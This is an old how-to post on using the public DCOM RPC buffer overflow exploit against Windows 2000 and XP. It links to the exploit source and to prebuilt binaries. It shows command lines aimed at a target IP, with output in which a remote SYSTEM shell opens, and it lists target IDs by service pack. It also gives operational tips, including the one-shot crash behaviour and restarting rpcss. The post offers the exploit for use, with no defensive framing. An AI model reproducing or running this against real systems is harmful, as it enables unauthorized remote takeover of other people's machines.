Penetrating windows #2 (dcom rpc bof)

Files:
Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed)
Freebsd binary: http://base.fujang.dk/files/mike/dcom
Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll
The Windows binary was compiled by padde (www.beastie.dk); modifications were
made to make it compile under Cygwin, so the source file available here was not
the one used to build that binary.

Windows usage:

C:\>dcom 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>

Unix usage:
bash$ ./dcom 0 192.168.10.123
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e81674
- Dropping to System Shell...

Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


The first argument (the leading 0 above) selects the target system and must be
one of the following:
-          0    Windows 2000 SP0 (English)
-          1    Windows 2000 SP1 (English)
-          2    Windows 2000 SP2 (English)
-          3    Windows 2000 SP3 (English)
-          4    Windows 2000 SP4 (English)
-          5    Windows XP SP0 (English)
-          6    Windows XP SP1 (English)

Though it says English, I have successfully tested this against several Danish
versions as well.

You will most likely have only one shot at this, because the vulnerable service
will crash after one try. Also, after successfully exploiting this you won't be
able to exploit again, because the service crashes. For more information, read the source.

It looks as though the service continues running during the shell. To restart the service, type: net start rpcss. Running this from the shell itself won't help; it has to be done afterwards.